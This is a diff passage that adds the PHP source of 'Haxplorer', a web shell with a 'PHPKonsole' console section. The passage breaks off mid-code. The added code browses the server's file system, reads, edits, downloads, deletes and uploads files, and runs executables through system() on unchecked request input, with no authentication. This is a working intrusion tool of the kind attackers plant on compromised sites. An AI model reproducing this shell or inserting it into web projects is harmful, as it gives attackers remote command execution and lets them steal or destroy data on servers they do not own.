+ 		   BORDER-TOP: black 0px solid;
+ 		   BORDER-BOTTOM: black 0px solid;
+ 		 }
+    .inputtext {
+		    background-color: #EFEFEF;
+		    font-family: arial, helvetica;
+		    border: 1px solid #000000;
+		    height: 20;
+    }
+    .lighttd {       background: #F8F8F8;
+    }
+    .darktd {        background: #E8E8E8;
+    }
+    input { font-family: arial, helvetica;
+    }
+    .inputbutton {
+                        background-color: silver;
+			border: 1px solid #000000;
+			border-width: 1px;
+			height: 20;
+    }
+    .inputtextarea {
+		    background-color: #EFEFEF;
+		    border: 1px solid #000000;
+		    scrollbar-width: 5;
+		    scrollbar-height: 5;
+		    scrollbar-face-color: #EFEFEF;
+		    scrollbar-shadow-color: silver;
+		    scrollbar-highlight-color: #EFEFEF;
+		    scrollbar-3dlight-color:silver;
+		    scrollbar-darkshadow-color: silver;
+		    scrollbar-track-color: #EFEFEF;
+		    scrollbar-arrow-color: black;
+    }
+    .top { BORDER-TOP: black 1px solid; }
+    .textin { BORDER-LEFT: silver 1px solid;
+              BORDER-RIGHT: silver 1px solid;
+ 	      BORDER-TOP: silver 1px solid;
+              BORDER-BOTTOM: silver 1px solid;
+              width: 99%; font-size: 12px; font-weight: bold; color: navy;
+            }
+    .notop { BORDER-TOP: black 0px solid; }
+    .bottom { BORDER-BOTTOM: black 1px solid; }
+    .nobottom { BORDER-BOTTOM: black 0px solid; }
+    .left { BORDER-LEFT: black 1px solid; }
+    .noleft { BORDER-LEFT: black 0px solid; }
+    .right { BORDER-RIGHT: black 1px solid; }
+    .noright { BORDER-RIGHT: black 0px solid; }
+    .silver{ BACKGROUND: silver; }
+  -->
+  </STYLE>
+  <TITLE><?php echo $SFileName ?></TITLE>
+ </HEAD>
+ <body topmargin="0" leftmargin="0">
+ <div style="position: absolute; background: white; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
+ <table width=100% height="100%" NOWRAP border="0">
+  <tr NOWRAP>
+   <td width="100%" NOWRAP>
+    <table NOWRAP width=100% border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="silver border">
+       <center>
+	    <strong>
+		 <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font>
+            </strong>
+       </center>
+      </td>
+     </tr>
+    </table><br>
+
+	<?php
+}
+
+if ( $cmd=="dir" ) {
+  	$h=@opendir($dir);
+ 	if ($h == false) {
+  		echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
+                COULD NOT OPEN THIS DIRECTORY!!!<br>".sp(3)."\n
+                THE SCRIPT WILL RESULT IN AN ERROR!!!
+                <br><br>".sp(3)."\n
+                PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...
+                <br><br></font>\n\n\n\n";
+ 	}
+        if (function_exists('realpath')) {
+		$partdir = realpath($dir);
+	}
+        else {
+		$partdir = $dir;
+	}
+ 	if (strlen($partdir) >= 100) {
+ 		$partdir = substr($partdir, -100);
+ 		$pos = strpos($partdir, "/");
+ 		if (strval($pos) != "") {
+ 			$partdir = "<--   ...".substr($partdir, $pos);
+ 		}
+        $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
+        $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); 
+	$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+ 	}
+    ?>
+      <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
+         <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
+	  <tr>
+	   <td width="100%" class="silver border">
+	    <center>&nbsp;HAXPLORER - Server Files Browser...&nbsp;</center>
+	   </td>
+	  </tr>
+	 </table>
+       <br>
+	 <table width="100%" border="0" cellpadding="0" cellspacing="0">
+	  <tr>
+           <td class="border nobottom noright">
+            &nbsp;Browsing:&nbsp;
+	  </td>
+          <td width="100%" class="border nobottom noleft">
+   	    <table width="100%" border="0" cellpadding="1" cellspacing="0">
+             <tr>
+              <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
+              <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GO<b></a>&nbsp;<center></td>
+             </tr>
+            </table>
+            
+	  </td>
+	 </tr>
+	</table>
+  <!--    </form>   -->
+        <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
+         <tr>
+	  <td width="100%" NOWRAP class="silver border">
+	   &nbsp;Filename&nbsp;
+	  </td>
+          <td NOWRAP class="silver border noleft">
+	   &nbsp;Actions&nbsp;(Attempt to perform)&nbsp;
+	  </td>
+          <td NOWRAP class="silver border noleft">
+	   &nbsp;Size&nbsp;
+	  </td>
+          <td width=1 NOWRAP class="silver border noleft">
+	   &nbsp;Attributes&nbsp;
+	  </td>
+          <td NOWRAP class="silver border noleft">
+	   &nbsp;Modification Date&nbsp;
+	  </td>
+	 <tr>
+    <?php
+
+
+      	/* <!-- This whole heap of junk is the sorting section... */
+
+ 	$dirn 	= array();
+ 	$filen 	= array();
+ 	$filesizes	= 0;
+ 	while ($buf = readdir($h)) {
+	    if (is_dir("$dir/$buf"))
+			$dirn[] = $buf;
+    		else 
+ 			$filen[] = $buf;
+    	}	 	
+		$dirno 	= count($dirn) + 1;
+ 		$fileno	= count($filen) + 1;
+
+  		function mycmp($a, $b){
+			if ($a == $b) return 0;
+			return (strtolower($a) < strtolower($b)) ? -1 : 1;
+		}
+
+		if (function_exists("usort")) {
+			usort($dirn, "mycmp");
+			usort($filen, "mycmp");
+		}
+		else {
+			sort ($dirn);
+	 		sort ($filen);
+	 	}
+	reset ($dirn);
+ 	reset ($filen);
+ 	if (function_exists('array_merge')) {
+		$filelist = array_merge ($dirn, $filen);
+	}
+ 	else {
+		$filelist = $dirn + $filen;
+	}
+
+	
+	if ( count($filelist)-1 > $Pmax ) {
+		$from = $Pidx * $Pmax;
+		$to = ($Pidx + 1) * $Pmax-1;
+		if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
+			$to = count($filelist) - 1;
+		if ($to > count($filelist)-1)
+			$to = count($filelist)-1;
+		$Dcontents = array();
+		For ($Fi = $from; $Fi <= $to; $Fi++) {
+			$Dcontents[] = $filelist[$Fi];	
+		}
+
+	}
+	else {
+		$Dcontents = $filelist;
+	}
+	
+     $tdcolors = array("lighttd", "darktd");
+
+     while (list ($key, $file) = each ($Dcontents)) {
+          if (!$tdcolor=arrval(each($tdcolors))) {
+	    reset($tdcolors);
+	    $tdcolor = arrval(each($tdcolors));	  }
+	  	         
+ 		if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
+          			/* <!-- Dirname --> */
+			echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
+  				/* <!-- Actions --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
+ 				/* <!-- Rename --> */
+			if ( ($file != ".") && ($file != "..") )
+				echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+ 				/* <!-- Delete --> */
+			if ( ($file != ".") && ($file != "..") )
+				echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+				/* <!-- End of Actions --> */
+			echo "&nbsp;&nbsp;</center></td>\n";
+  				/* <!-- Size --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
+ 				/* <!-- Attributes --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+ 			echo "<strong>D</strong>";
+		        if ( @is_readable("$dir/$file") ) {
+   				echo "<strong>R</strong>";
+ 			}
+ 			if (function_exists('is_writeable')) {
+				if ( @is_writeable("$dir/$file") ) {
+ 					echo "<strong>W</stong>";
+ 				}
+			}
+ 			else {
+    				echo "<strong>(W)</stong>";
+  			}
+  			if ( @is_executable("$dir/$file") ) {
+ 				echo "<Strong>X<strong>";
+ 			}
+ 			echo "&nbsp;&nbsp;</td>\n";
+ 				/* <!-- Date --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+ 			echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+ 			echo "</td>";
+			echo "</tr>\n";
+
+        	}
+  		else { /* <!-- Then it must be a File... --> */
+     				/* <!-- Filename --> */
+			if ( @is_readable("$dir/$file") )
+ 				echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
+  			else
+  				echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
+  			   				/* <!-- Actions --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
+ 				/* <!-- Rename --> */
+			echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+  				/* <!-- Edit --> */
+			if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+ 				echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
+   				/* <!-- Copy --> */
+ 			echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
+  				/* <!-- Move --> */
+			if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+ 					echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
+    				/* <!-- Delete --> */
+			echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+ 				/* <!-- Download --> */
+			echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
+ 				/* <!-- Execute --> */
+			if ( @is_executable("$dir/$file") )
+ 				echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
+    				/* <!-- End of Actions --> */
+			echo sp(2)."</center></td>\n";
+ 				/* <!-- Size --> */
+			echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
+ 			$size = @filesize("$dir/$file");
+ 			If ($size != false) {
+			        $filesizes += $size;
+				echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
+			}
+			else
+				echo "&nbsp;&nbsp;<strong>0 B<strong>";
+ 			echo "&nbsp;&nbsp;</td>\n";
+
+ 				/* <!-- Attributes --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+
+ 			if ( @is_readable("$dir/$file") )
+ 				echo "<strong>R</strong>";
+   			if ( @is_writeable("$dir/$file") )
+ 				echo "<strong>W</stong>";
+   			if ( @is_executable("$dir/$file") )
+ 				echo "<Strong>X<strong>";
+   			if (function_exists('is_uploaded_file')){
+ 				if ( @is_uploaded_file("$dir/$file") )
+ 					echo "<Strong>U<strong>";
+ 			}
+ 			else {
+				echo "<Strong>(U)<strong>";
+			}
+ 			echo "&nbsp;&nbsp;</td>\n";
+			 	/* <!-- Date --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+ 			echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+ 			echo "</td>";
+ 			echo "</tr>\n";
+ 		}
+  	}
+
+    	echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
+  	echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Dir(s),&nbsp;".@count ($filen)."&nbsp;File(s)&nbsp;&nbsp;\n";
+  	echo "</td><td NOWRAP class=\"silver border noleft\">\n";
+  	echo "&nbsp;&nbsp;Total filesize:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
+	
+	function printpagelink($a, $b, $link = ""){
+		if ($link != "") 
+			echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
+		else
+			echo "<b>| $a - $b |</b>";
+	}
+        
+	if ( count($filelist)-1 > $Pmax ) {
+		echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
+		$Fi = 0;
+		while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
+			$from = $Fi*$Pmax;
+			while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+			$to = ($Fi + 1) * $Pmax - 1;
+			if ($Fi == $Pidx)
+				$link="";
+			else 
+				$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+			printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
+			echo "&nbsp;&nbsp;&nbsp;";
+			$Fi++;
+		}
+		$from = $Fi*$Pmax;
+		while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+		$to = count($filelist)-1;
+		if ($Fi == $Pidx)
+			$link="";
+		else 
+			$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+		printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);		
+		
+	
+		echo "</center></td></tr></table></td></tr>";
+	}
+
+
+    	echo "</table>\n<br><table NOWRAP>";
+
+  	if ($isGoodver) {
+		echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
+	}
+ 	else {
+		echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
+	}
+      		/* <!-- Other Actions --> */
+   	echo "<tr><td class=\"silver border\">&nbsp;<strong>Other actions:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
+  	echo "<td>&nbsp;<b>".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+	                     buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+			     buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
+    	echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
+  	echo "<tr><td class=\"silver border\">&nbsp;<strong>Your IP:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
+  	echo "<tr><td class=\"silver border\">&nbsp;<strong>Browsing Directory:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
+  	echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Legend:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
+  	echo "<table NOWRAP>";
+        echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Directory.</td></tr>\n";
+   	echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Readable.</td></tr>\n";
+  	echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Writeable.</td></tr>\n";
+  	echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Executable.</td></tr>\n";
+  	echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
+  	echo "</table></td>";
+ 	echo "</table>";
+ 	echo "<br>";
+     	@closedir($h);
+  }
+  elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
+ 	echo system("$file");
+ }
+elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
+	echo "<center><table><tr><td NOWRAP>" ;
+ 	if ($auth == "yes") {
+		if (Mydeldir($file)==false) {
+ 			echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
+  		}
+ 		else {
+ 			echo "Successfully removed \"$file\"<br>";
+ 		}
+ 		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
+	}
+ 	else {
+		echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
+     	<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+     	<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+     	<input type=\"hidden\" name=\"file\" value=\"$file\">
+     	<input type=\"hidden\" name=\"auth\" value=\"yes\">
+     	<input type=\"submit\" value=\"Yes\"></form>
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+	<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+ 	echo "</td></tr></center>";
+}
+ elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */	echo "<center><table><tr><td NOWRAP>" ;
+ 	if ($auth == "yes") {
+		if (@unlink($file)==false) {
+ 			echo "Could not remove \"$file\"<br>";
+  		}
+ 		else {
+ 			echo "Successfully removed \"$file\"<br>";
+ 		}
+		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
+        }
+ 	else {
+       	echo "Are you sure you want to delete \"$file\" ?
+      	<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+     	<input type=\"hidden\" name=\"cmd\" value=\"delfile\">
+     	<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+     	<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+     	<input type=\"hidden\" name=\"file\" value=\"$file\">
+     	<input type=\"hidden\" name=\"auth\" value=\"yes\">
+
+     	<input type=\"submit\" value=\"Yes\"></form>
+       	<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+	<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+ 	echo "</td></tr></center>";
+}
+elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
+	echo "<center><table><tr><td NOWRAP>";
+ 	$i = 1;
+ 	while (file_exists("$lastdir/newfile$i.txt"))
+ 		$i++;
+ 	$file = fopen("$lastdir/newfile$i.txt", "w+");
+ 	if ($file == false)
+ 		echo "Could not create the new file...<br>";
+ 	else
+ 		echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
+ 		echo "
+   			<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+			<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+			<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+			<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
+			</form></center>
+ 			</td></tr></table></center>   		";
+	}
+elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
+	echo "<center><table><tr><td NOWRAP>" ;
+ 	$i = 1;
+ 	while (is_dir("$lastdir/newdir$i"))
+  		$i++;
+ 	$file = mkdir("$lastdir/newdir$i", 0777);
+ 	if ($file == false)
+ 		echo "Could not create the new directory...<br>";
+ 	else
+ 		echo "Successfully created: \"$lastdir/newdir$i\"<br>";
+ 	echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+		<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+		<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+		<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
+		</form></center></td></tr></table></center>";
+}
+elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
+	$contents = "";
+	$fc = @file( $file );
+  	while ( @list( $ln, $line ) = each( $fc ) ) {
+  		$contents .= htmlentities( $line ) ;
+ 	}
+ 	echo "<br><center><table><tr><td NOWRAP>";
+	echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+	echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
+	echo "<strong>EDIT FILE: </strong>$file<br>\n";
+	echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
+	echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
+	echo "<input type=\"submit\" value=\"Save\">";
+	echo "</form>";
+	echo "</td></tr></table></center>";
+}
+elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
+	$fo = fopen($file, "w");
+	$wrret = fwrite($fo, stripslashes($contents));
+	$clret = fclose($fo);
+}
+elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
+	$downloadfile = urldecode($file);
+	if (function_exists("basename"))
+    		$downloadto = basename ($downloadfile);
+	else
+		$downloadto = "download.ext";
+	if (!file_exists("$downloadfile"))
+		echo "The file does not exist";
+	else {
+		$size = @filesize("$downloadfile");
+		if ($size != false) {
+			$add="; size=$size";
+		}			
+		else {
+			$add="";
+		}
+ 		header("Content-Type: application/download");
+		header("Content-Disposition: attachment; filename=$downloadto$add");
+		$fp=fopen("$downloadfile" ,"rb");
+		fpassthru($fp);
+		flush();
+	}
+}
+elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ 
+   	?>
+	<center>
+	 <table>
+	  <tr>
+	   <td NOWRAP>
+    		Welcome to the upload section...
+ 		Please note that the destination file will be
+		<br> overwritten if it already exists!!!<br><br>
+ 		<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
+ 			<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
+ 			<input type="hidden" name="cmd" value="uploadproc">
+ 			<input type="hidden" name="dir" value="<?php echo $dir ?>">
+ 			<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
+ 			<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
+ 			Select local file:<br>
+ 			<input size="75" name="userfile" type="file"><br>
+ 			<input type="submit" value="Send File">
+ 		</form>
+		<br>
+ 		<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
+			<input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
+			<input type="hidden" name="dir" value="<?php echo $lastdir ?>">
+			<input tabindex="0" type="submit" value="Cancel">
+		</form>
+	   </td>
+	  </tr>
+	 </table>
+	</center>
+
+ 	<?php
+}
+elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
+	echo "<center><table><tr><td NOWRAP>";
+	if (file_exists($userfile))
+		$res = copy($userfile, "$dir/$userfile_name");
+	echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
+     	if ($res) {
+		echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
+		echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>";
+		echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
+	}
+	else {
+		echo "Could not move uploaded file; Action aborted...";
+	}
+	echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
+	echo "<br><br></td></tr></table></center>";
+}
+elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
+        echo "<hr>"; 
+	$fc = @file( $file );  	while ( @list( $ln, $line ) = each( $fc ) ) {
+  		echo spacetonbsp(@htmlentities($line))."<br>\n";
+  	}
+	echo "<hr>";
+}
+elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
+     	if (function_exists('is_dir')) {
+ 		if (is_dir("$oldfile")) {
+ 			$objname = "Directory";
+ 			$objident = "Directory";
+  		}
+ 		else {
+ 			$objname = "Filename";
+ 			$objident = "file";
+ 		}
+ 	}
+   	echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
+	If (empty($newfile) != true) {
+ 		echo "<center>";
+	 	$return = @rename($oldfile, "$olddir$newfile");
+		if ($return) {
+ 			echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
+ 		}
+ 		else {
+ 			if ( @file_exists("$olddir$newfile") ) {
+ 				echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
+ 			}
+ 			else {
+ 				echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
+ 			}
+  		}
+ 		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
+ 	}
+ 	else {
+ 		$dpos = strrpos($oldfile, "/");
+ 		if (strval($dpos)!="") {
+ 			$olddir = substr($oldfile, 0, $dpos+1);
+   		}
+ 		else {
+ 			$olddir = "$lastdir/";
+		}
+ 		$fpos = strrpos($oldfile, "/");
+ 		if (strval($fpos)!="") {
+ 			$inputfile = substr($oldfile, $fpos+1);
+   		}
+ 		else {
+	 		$inputfile = "";
+ 		}
+       		echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+ 		echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
+ 		echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
+ 		echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
+ 		echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
+ 		echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
+ 		echo "Rename \"$oldfile\" to:<br>\n";
+ 		echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; 
+		echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
+ 		echo "</td></tr></table></center>";
+ 	}
+}
+else if ( $cmd == "con") {
+
+?>
+<center>
+<table>
+ <tr><td>
+<h3>PHPKonsole</h3>
+
+<?php
+
+if (ini_get('register_globals') != '1') {
+    if (!empty($HTTP_POST_VARS))
+	extract($HTTP_POST_VARS);
+	  
+    if (!empty($HTTP_GET_VARS))
+	extract($HTTP_GET_VARS);
+	      
+    if (!empty($HTTP_SERVER_VARS))
+	extract($HTTP_SERVER_VARS);
+    }
+		    
+    if (!empty($work_dir)) {
+	if (!empty($command)) {
+	    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+	        if ($regs[1][0] == '/') {
+	            $new_dir = $regs[1];
+		} else {
+		    $new_dir = $work_dir . '/' . $regs[1];
+		}
+		if (file_exists($new_dir) && is_dir($new_dir)) {
+		    $work_dir = $new_dir;
+		}
+		unset($command);
+	    }
+	}
+    }
+    if (file_exists($work_dir) && is_dir($work_dir)) {
+	chdir($work_dir);
+    }
+    $work_dir = exec('pwd');
+?>
+
+    <form name="myform" action="<?php echo "$PHP_SELF?$urlAdd" ?>" method="post">
+	<table border=0 cellspacing=0 cellpadding=0 width="100%"><tr><td>Current working directory: <b>
+	<input type="hidden" name="cmd" value="con">
+	<?php
+	    $work_dir_splitted = explode('/', substr($work_dir, 1));
+	    printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr);
+	    if (!empty($work_dir_splitted[0])) {
+		$path = '';
+		for ($i = 0; $i < count($work_dir_splitted); $i++) {
+		    $path .= '/' . $work_dir_splitted[$i];
+		    printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]);
+		}
+	    }
+	?></b></td>
+	<td align="right">Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()">
+	
+	<?php
+	$dir_handle = opendir($work_dir);
+	while ($dir = readdir($dir_handle)) {
+	    if (is_dir($dir)) {
+		if ($dir == '.') {
+		    echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+		} elseif ($dir == '..') {
+		    if (strlen($work_dir) == 1) {
+		    }
+		    elseif (strrpos($work_dir, '/') == 0) {
+			echo "<option value=\"/\">Parent Directory</option>\n";
+		    } else {
+			echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+		    }
+		} else {
+		    if ($work_dir == '/') {
+			echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+		    } else {
